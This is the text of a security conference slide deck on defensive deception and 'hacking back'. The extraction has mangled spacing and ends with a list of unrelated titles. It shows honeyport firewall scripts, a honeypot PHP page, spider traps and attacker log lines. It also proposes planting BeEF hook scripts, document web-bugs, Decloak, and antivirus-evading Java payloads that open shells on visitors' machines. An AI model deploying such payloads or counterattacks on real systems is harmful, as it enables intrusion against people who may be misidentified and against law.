paul asadoorian - bringing sexy back

Bringing Sexy Back:Defensive Measures That Actually Work

Paul Asadoorian (paul@pauldotcom.com)

John Strand (john@pauldotcom.com) http://pauldotcom.com

Paul Asadoorian

http://pauldotcom.com

Goal: Bring Sexy Back

h"p://pauldotcom.com

Outline

• # whoami• Introduc-on‐OODA,Don’trunaway

• CaseStudies‐ReasonswhyweCANdothis

• Warningbanners‐Allowsyoutodothingsyoudisclose

• Annoyance‐Mr.Clippy,UserAgent,SpiderTraps

• A9ribu-on‐BeEF,MetasploitDecloak

• A9ack‐SET,Javapayloads,purpleASCIIart

Introduction

Yes, I said “Hacking Back” but don’t run away

DisclaimerThe contents of this presentation may get you into trouble. In fact, conventional wisdom stipulates that everything we are going to discuss is a “bad idea.” Make sure you vet any tactics in this presentation by your legal team and upper management first.

Any action you take from this presentation should be documented in writing before implementing.

First off, why are we talking about “hacking back”?

SuccessfulPenetra-onTests

• MostorganizaOonsprovideeasyaccesstotheir“intellectualproperty”• Howmanypentestshaveyoubeenon?

• Howmanyofthoseweresuccessful?

• Or?• Howmanywomenhaveyoudated?

• Howmanyhaveyousleptwith?

Why Are Penetration Tests Always So Successful?

1.FlimsyDefensive“Layers”

2.SocialEngineering

Because there is no patch for human stupidity...

3.Passwords

4.SoLwareVulnerabili-es

John&PaulThenThought

• Wecandobe"er

• Whatifweweretodefendsystems,applyingwhatweknowabouta"acks?

• Forsolongwe’vegonedownthebeatenpaththatwecall“security”

• ItsOmetobreakthemold

Wealsothoughtabouthowmessywegetwhenea-ngnoodles,butsomeonebeatustothesolu-on...

WhyUseOffensiveCounterMeasures?

• ThereareOmeswhereyouwillberequiredtodo“more”• InparOcularwhenworkingwithlawenforcement

• Thea"ackersarege^ngmoreandmorebrazen• Veryli"leperceivedriskontheirpart

• Wehaverules,theydon’tfollowrules

• Youmayneedtofigureoutwhatana"ackerisaberorgatherinformaOonaboutthem• e.g.Iftheyarea"ackingfromabot‐netorthroughTOR

• Whomevercandothesethingsthefastestlives:• Observe

• Orient

• Decide

• Act

• Originallydevelopedforfighter‐pilots

• Withcurrentsecuritymodelshowmanycanyouimpact?

• Worksbothways,Dis‐Orienta"ackers!

JohnBoyd

Paul,“figh-ng”

Case Studies

Stuff other people did that makes what we’re going to do look okay

CaseStudy:ConsenttoUniversityNetworkTerms

• Sysadminhacksintothreateningmachine• Gatheredevidenceusedagainststudentusingtemp/tempcreds

• Student’sconsenttouniversitytermsjusOfiessysadmin

• U.S.v.Heckenkamp

• KevinPoulsen,“CourtOkaysCounter‐HackofeBayHacker'sComputer,”ThreatLevel,April6,2007,• h"p://blog.wired.com/27bstroke6/2007/04/court_okays_cou.html

“A federal appeals court just shot down an a4empt by confessed superhacker Jerome Heckenkamp to overturn his computer crime convic=ons, which were an end result of informa=on provided by a university sysadmin who broke into Heckenkamp’s computer to gather evidence.”

CaseStudy:PublicExampleofReflectedA9ack

• 1999‐WorldTradeOrganizaOonwebsite

• DOSa"ackfromE‐HippiesCoaliOon

• HosOngserviceConxionreflectedthea"ackbacktoE‐Hippiesanddisableditswebsite

• Conxionnotprosecuted• h"p://www.networkworld.com/research/2000/0529feat2.html

"So we told our filtering soFware to redirect any packets coming from these machines back at the e‐hippies Web server"

CaseStudy:MSFTCourtOrder–Botnet

• Civillawsuit2010

• CourtissuesordertosuspendthedomainsassociatedwiththeWaledacbotnet

• MSFTtakes“othertechnicalmeasures”todegradethebotnet• www.google.com/buzz/benwright214/PcJTmLbEwit/Cyber‐Defense‐Law‐Botnet‐Computer‐Crime‐Lawsuit

“No=ce that MicrosoF is not doing this in the dark. It is working through our open public court system, so that MicrosoF is transparent and accountable and all can see what is happening and evaluate it.”

CaseStudy:DOJTakesOver2MillionNodeBotnet

• AjudgegavepermissiontoFBIandU.S.MarshalstosetupserverstostoptheCorefloodbotnet

• Theywerealsogivenpermissionto“tosendcommandstoinfectedcomputersthatstopstheCorefloodvirus”

• Theyseized5serversand29domainnames

• DOJnowowns2.5millioncomputersontheInternet,andwillessenOallytellthemalwaretoself‐destruct

• What,thisisn’tsexyenoughforyou?

LetsPretendI’maLawyer

• I’madvisingyouto:• Discuss

• Document

• Plan

• Consultwithothers,revealyourplans!

• HidingintenOonsmeansyouthinkwhatyouaredoingis"wrong”

• Ruleofthumb:Don’tbeevil• Whileitcanseemlikealotoffun,itcangetyouinbigtrouble

Note:WelovetheEFF(eff.orggodonate!)

Okay,LetsStopPretending

• Couldthisgetyouintotrouble?• Possibly.Thereiss-llsomedebateonhowtodoitproperly

• Thereareafewthingswecanavoidtokeepusfromge^ngintrouble• Don’teverputmalwarewhereitispubliclyaccessible

• Don’tmakeittoeasytogetto

• UseWarningBanners...

Warning Banners

Warning, we are going to talk about warning banners...

LookatYourWarningBanner

• Thereisalotinthereaboutpermission

• Thereareanumberoftechnologiesthatwill“check”yoursystembeforeitaccessesthenetwork• OpenVPNscripts(LikeaNACCheck)

• Windows2008NetworkAccessProtecOon

• IsitpossibletousethisasameanstogathersomeinformaOonaboutana"ackersystem?

• Putinyourwarningbannerthatyoucandowhatyouwant!

Example:EricNeededaWarningBanner

• Whatdoesakitchenknife,acrutch,andductapehavetodowithanything?

• Itisillegaltosetuplethaltrapsfortrespassers

• However,ifyoutellthemtheremaybeevilthingsonyournetwork/propertyyouwarnedthem

"superwenttoopenthedoor,feltresistanceandfoundtherigged contrap-on"‐‐ a big knife duct‐taped to a crutch,whichwasinstalledwithanelas-ccord.Thesuperwasnotinjured.

Eric Stetz was arrested and charged with recklessendangermentforavicious‐lookingboobytrap.

h"p://gothamist.com/2008/04/06/homemade_booby.php

WARNING: There is a knife duct taped to a crutch attached to an elastic band. Enter at your own

Would this have kept Eric Stetz out of trouble?

FREE VASECTOMY

This likely would not have kept Eric Stetz out of trouble...

RealityCheck:Don’tBeStupid(likeEric)

• Howcouldthisgowrongforyou?• Dumbmoves(likeknifecrutches)

• Easilyaccessiblemalware(e.g.traps)

• Fulla"acksofa"ackerIPaddresses

• Purposelydamagingsystems

• Persistentlong‐termaccesstobadguys

• WehavesmarteropOonstoworkwith1. Annoyance

2. A9ribu-on

3. A9ack

Annoyance

Stressing out the attackers...37

Annoyance:HoneyPorts

• Forcesa"ackerstomakeafullconnecOontoavoidspoofingpiralls

• A"ackersandtestershatethis……..

@echo offfor /L %%i in (1,1,1) do @for /f "tokens=3" %%j in ('netstat -nao ^| find ^":3333^"') do@for /f "tokens=1 delims=:" %%k in ("%%j") do netsh advfirewall firewall add rulename="WTF" dir=in remoteip=%%k localport=any protocol=TCP action=block

IfamachinemakesafullTCPconne-ontoport3333,afirewallruleisaddedtoblockthesourceIPaddress

Annoyance:HoneyPorts

• WorksonLinuxtooofcourse,sameconcept

• MusthaveworkingcopyofNetcatonyoursystem

• ShouldbemodifiedtologenOresandreportbacktoenterpriseSIEM

[root@linux ~]# while [ 1 ] ; echo "started" ; do IP=`nc -v -l -p 2222 2>&1 1> /dev/null | grep from | cut -d[ -f 3 | cut -d] -f 1`; iptables -A INPUT -p tcp -s ${IP} -j DROP ; done

Annoyance:Mr.Clippy

• ThroughPHPIDSwecanmakea"ackingawebsite“interesOng”

• First,installPHPIDS

• PHPIDShasclippingthreshholds

• Thencreatearuletoalla"ackerstopullupMr.Clippy

Annoyance:MakingYourWebsiteLookLikeSomethingElse

Oh,yourIIS,hereareallmyIISa9acks!

Annoyance:FilterUser‐AgentStrings

• FiltertheUser‐Agentsinusebya"ackersandtesters:• Nikto,AcuneOx,“IamHackingYou”

• Sitesdonotlockdownthemobileversionofwebsite• TherehasbeenalotofresearchinthisareabyChrisJohnRiley

• E.gUsingtheiPhoneUser‐Agentrevelsmobileversionofsite

• Somepeopledon’tsecurethemobileversion

• WhatifyoupresenttrapsorDoScondiOonsbasedonUser‐Agent?

h"p://pauldotcom.com 43

$ip = getenv(REMOTE_ADDR);$useragent = getenv(HTTP_USER_AGENT);

$to = "yournonproductionemail@example.com";$subject = "Robots honeypot from " . $ip;$body = "User at " . $ip . " tripped robots honeypot.\nUser-Agent was: " . $useragent;

mail($to, $subject, $body);

echo("<html><h1>Congratulations, you found the secret page. Now email " . $to . " to avoid being blacklisted.</h1></html>");

echo("Your IP address is: " . $ip . "\n");

echo("Your User Agent is: " . $useragent . "\n");

Annoyance:MessingwithA9ackersHeads

CreditJoshWright:h9p://mail.pauldotcom.com/pipermail/pauldotcom/2009‐February/000713.html

Annoyance:MessingwithA9ackersHeads

Thisallhappenedinthesameday!

Funpartiswegettomakethingsupastowhythishappened...

Annoyance:EvilWebServers

• Manytestersanda"ackersuseautomatedcrawling• ThishelpsidenOfypagesandpossibleinserOonpointsfortheira"acks

• Iftheysaytheydon’t,theyareprobablylying

• *Maybe*thereisawaytoa"ackthetools• Se^ngupaDoScondiOonfortheirautomatedscanner

• Note:ThisisnotsomethingyouwanttotryonanexternalwebserverthatyouwanttohavecrawledbyGoogle• Configurerobots.txttopointtoresourcesyoucontrol

• NOTsomethingyouputinyourindex.phppage!

Exploi-ngExis-ngVulnerabili-es

• AccuneOxDoSinSnifferComponent• h"p://www.symantec.com/business/security_response/

a"acksignatures/detail.jsp?asid=23507

• WebinspectCrashesLoadingReports• h"p://seclists.org/educause/2009/q3/526“We can run the scans but if you

select a report that has cri=cal vulnerabili=es in it the report generator crashes with invalid characters.”

• AppScanVulnerabiliOes• SSL:h"ps://www‐304.ibm.com/support/docview.wss?uid=swg1PM24290

• LoginRecording:h"ps://www‐304.ibm.com/support/docview.wss?uid=swg1PM04998

EvilAnnoyance:FuzzingA9ackerTools

• Whynotbrowsethea"ackers/testerstools?

• Thereareanumberofdifferentbrowserfuzzersavailable• Bf3,Sully,Python

• WecanalsouseDOM‐Hanoi• Gearedtowardsbrowserfuzzing,buthey.Itworks

• Actually,itjusttakesalongOmetorun

• Goal:Buildapagethatconsistantlycrashesthea9ackerstool!

Annoyance:SemngTraps

SpiderTrap&WebLabyrinth

• Spidertrap:SmallPythonscripttotrapwebspiders

• BenJacksoncreatedaPHPversioncalledWebLabyrinth

• ItisPHPsoyoucanloaditinyourwebinfrastructure

• Hasanumberofcoolfeatures• GentlytellsGooglebottogoaway

• RandomHTTPcodes

• *NEW*DatabaseSupport

• *NEW*AlerOngwithIDS‐stylerules

• DavidBowieApproved

Preven-on:NessusExample

Keepingit“Real”

Wget:FallingIntoTheTrap

NowforW3AF

ThisisGoingtoTakeaWhile...

Alsoannoying

HelpstheInternetBeaBe9erPlace?

[17/Mar/2011:21:32:03 +0000] [209.20.92.14/sid#19367c8][rid#26616d8/initial] (1) redirect to http://securityfail.com/labyrinth/ [REDIRECT/302]

209.190.23.66 - - [17/Mar/2011:21:32:03 +0000] "GET //admin/ HTTP/1.1" 302 192 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"

TheIPAddress209.20.92.14wonderedintothelabyrinth:

“/admin”onmyserverredirectspeopleorbotstothelabyrinth:

Interes-ngUserAgent,eh?

• Turnsout“ZmEu”isapopularstringfortheuseragenttocontainforbotslookingforinsecurewebapplicaOons

• IftheautomatedbotswasteOmeinmylabyrinth,thatslessOmetheyspenda"ackingothersites

• ItsalsolessOmetheyspendonmyownsitetryinglamea"acks,thatlikelywouldnotworkanyway

• My“traps”shouldalsospringonsomeofthefollowingrequestsaswell:

[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/phpmyadmin[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/phpMyAdmin[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/dbadmin[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/myadmin[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/MyAdmin

HelpstheInternetBeaBe9erPlace?

Laughingatmeorlaughingatthem?• Nicetoseea"ackersaresmilingatme,ornot• MulOplea"emptsfromdifferentIPsacrossmulOpleservers

• About“anO‐sec”:

[client 68.178.200.178] File does not exist: /var/lib/mediawiki/w00tw00t.at.blackhats.romanian.anti-sec:)65.18.168.136 - - [04/Mar/2011:19:53:13 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"72.167.165.90 - - [21/Feb/2011:10:56:01 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"89.108.119.29 - - [06/Feb/2011:02:01:52 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"

The Anti Security Movement (also written as antisec and anti-sec or antii-sec) is a popular[citation needed]movement opposed to the computer security industry. It attempts to censor the publication of information relating to but not limited to: software vulnerabilities, exploits, exploitation techniques, hacking tools, attacking public outlets and distribution points of that information.

Attribution

I can still see you...58

Protec-ngYourIntellectualProperty

• “Callbacks”‐SimilartoSobwareupdates

• SendsinformaOonbacktohomebaseaboutsystem

• IPaddress,hardwareandsobwareconfiguraOons

• MicrosobGenuineAdvantage,crashdumps

• Trackingsobwareinphones• JustlookatAndroid...Does“checkers”reallyneedaccesstomycontactlistandcallhistory?

• Wearenotnecessarytalkingabout“hacking”perse

• Wearetalkingaboutge^nga"ribuOon

Sendmyinforma-ontoMicrosoL?

WordWeb‐Bugs• FeaturebuiltintoexploitframeworksforpenetraOontesOng

• ThistacOcworksgreatattrackingintellectualproperty

• Notallwaysofa"ribuOonneedresultinshellaccess

• Farlesslikelytocrashasystem

• EmbedthiscodeinaspreadsheetcalledSSN.xlsandwatchhowfastana"ackerrunsthemacros

• Callbackshouldgotoacloselymonitoredsystem

ThisislikeSpyStuff,likeJamesBond...

“OhhhhhhJames...” See,DefenseISSexy!Eh?

Howdoesitwork?

• Itsimplyinsertsareferencetoacssrunningonthesystem,inthiscase,runningCoreIMPACT

• WhenthedocisopenedittriestoopentheURL

• DirectconnecOon!

WebApplica-onStreetfigh-ng

• HowcanweuseJavaScriptagainstthea"ackers?

• BeEF(BrowserExploitaOonFramework)• HarvestinformaOon

• Senddirectlinks

• Possiblyexploittheirsystems(XMLRPC)

• Maybewecouldjustmesswiththem• SendindicaOonsofXSSandSQLiineveryresponsetotheira"acks

• Weneedtohaveawidevarietyoftoolsandtechniques

• Leadthea"ackertodecoysitethatnolegituserwouldvisit

• Example:robots.txt:

• Example:admin.phpdisplaysabogusloginpage

• Hiddeninadmin.phpis“TheHook:

• <scriptlanguage='Javascript'src="h"p://<yourserver>/beef/hook/beefmagic.js.php'></script>

BeEF:Getthea9ackertoconnect

User-agent: *Disallow: /admin/admin.php

Ilikeninjagrapplinghooks....

HookedonBeEF:Nowwhat?

• CapabiliOesarebroad• Gatherinfo

• Browsertypeandversion,OStypeandversion,screenresoluOon,etc.

• Simplepopup:

A9ackersuseIIS6.0?NoWay!

BeEFModules• Theissueisdecidinghowfartogo

• Doyoucrossthelinebetweeninfogatheringanda"ackingthea"acker(s)system?

• YoucandothatwithBeEF,notsayingthatyoushould,butyoucanifyouhavepermission

• Crosstheline:Manybuilt‐inmodules• MetasploitintegraOon:BrowserAutopwn,

SMBChallengeTheb,etc.

• DoSmaybeokay,andthisseemslikeagoodplacetobuildaDoSforyourfavorite,ornottofavorite,hackingtool

• Example:FindanexploitforNiktoandputitintoBeEF

BeEFModules(2)

Whoelsehavetheyhacked?

Whoaretheyreally?Howaretheyhiding?

Sendthemtoyourcompe--on

A9ribu-on:Decloak

• FromtheMetsploitproject• MoreinformaOonh"p://decloak.net/

• Greatplacetoredirectusersfromrobots.txt

• Manya"ackersandpenetraOontesterswilluseproxiesand/orTortohidetheirIPaddress

• DecloakcanrevealtherealIPaddressofthescanner

“This tool demonstrates a system for iden=fying the real IP address of a web user, regardless of proxy seOngs, using a combina=on of client‐side technologies and custom services.”

LookingattheComponentsofDecloak

Now,forJava

TheDNSServer

CompileandStart

Now,SurftoYourLinuxSystem

CheckingtheDatabase1

ViewingtheData

WirelessCountermeasureExample

• Step1:SetupahiddenSSID(“private”or“guest”)

• Step2:UseacapOveportalwhenpeopleconnecttoit

• Step3:PortalloginpagecontainsBeefhookorSETexploit(useyourwarningbanner!)

• Step4:CollectinformaOonabouta"acker(dissolvableagents)

• Step5:(OPTIONAL)BanWifiMaconWIPSand/orWirelessnetwork(worksunOltheychangeit)

Gotchas

• MakesureSSIDhasaccesstonothingorjustmorehoneypots

• Toughone:PreventrealusersfromconnecOngtoit

• Tougherone:Makea"ackersthinkitsarealSSID&network

• Danger:MakesureyourBEeFserverisnotajumpingoffpoint

Pwningyourselfisnotfun

Wireless:MoreThoughts

• Sendwirelessdriverexploitsonthenetwork,triggeredbysomeevent• Easilywillbackfire...

• Answertoclientsprobingfornon‐producOonnetworks,sendthemtoapagethattellsthemtheyaremis‐configured(beatthea"ackerstoit)• Mayreallypissoffusers

• BluetoothCanary‐LeaveBluetoothphonewithOBEXenabled• Haveaddressbookwithnumbersthatallroutetoyou

Attack

Gopher is an old protocol too...83

A9ack:JavaPayload

• Ifwecangetana"ackertoloadaJavapayload,whynotgivethemsomethinginteresOng,likeaMetaploitpayload?

• JavapayloadsareawesomeforpenetraOontesters,novulnerabiliOesrequired!

• Theycanalsobeusefulfora"ackers...

Justfor@beakerand@a9ri-on

EvilJavaApplica-on

• EmbedamaliciousJavaApplicaOoninanon‐producOonwebserver• Usuallyinadirectorythatisnoindexand/ornofollowinrobots.txt

• Thea"acker/vicOmwillgetapop‐upaskingiftheywanttoopentheJavaapplicaOon

• Theywill,a"ackerstendtobeverycurious

• Thepayloadcanbeflexible(Shell,Rootkit,VNC)

• YoucanautomaOcallyrunenumeraOonscriptswhenthea"acker/vicOmrunstheapplicaOon

BrowsingtoYourSite

EveryoneClicks“Run”

h"p://[YourLinuxIP]

ConfiguringSET

DaveKennedy,theauthorofSET,lovespurple.

WebsiteA9acksareKey

UsingJava...GloriousJava

DefaultTemplates

ChoosingyourPayload

EncodingtoDodgeAV

YouSayYES!!

HaveYourBacktrackSystemSurftoSET

NotPre9y..ButitWorks

Precau-onsandUsage

• Putthisontheinsideofthenetwork

• Carefulana"ackerdoesn’tredirectyourusers

• MakesurenoonecantakeoveryourMetasploitinstance

• Don’thavetodoanythingwiththeshell• Youcanautoruncertainnon‐damagingcommands

• pingyoursystem

Listen

- http://pauldotcom.com/radio (24/7)

- Podcast in iTunes (audio/video)

- Live! http://pauldotcom.com/live

- “TV” http://pauldotcom.blip.tv

Participate

- Mailing List: http://mail.pauldotcom.com

- Community: http://pauldotcom.com/insider

- IRC: irc.freenode.net #pauldotcom

- http://pauldotcom.com (Blog)

- Email us psw@pauldotcom.com

Want More?(Shameless Plug)

OFFENSIVE COUNTERMEASURES: DEFENSIVE TACTICS THAT ACTUALLY WORK

Black Hat Las Vegas 2011

Register Today!

The End

Wake up, time for Questions?

paul asadoorian - bringing sexy back

Technology

gliif a savvy, simple and sexy solution bringing exceptional...

sexy orchids

making eccomerce sexy

search is sexy

bringing sexy back: the book party in the digital age

html5 it's sexy!

bringing sexy back - def con · bringing sexy back breaking...

naturaleza sexy

album sexy

dreamgirl simply sexy 2020...

greg asadoorian – director invensys global fleet new...

bringing sexy back: engaging social media tactics you can...

sexy spider ladys

creating sexy sideshows

captivate magazine - bringing sexy back! - march 2015

sexy y usable

how starting your own business are bringing sexy

powerpoint presentation · sexy not just about shape. size...

enterprise is sexy

bringing sexy back to internet applications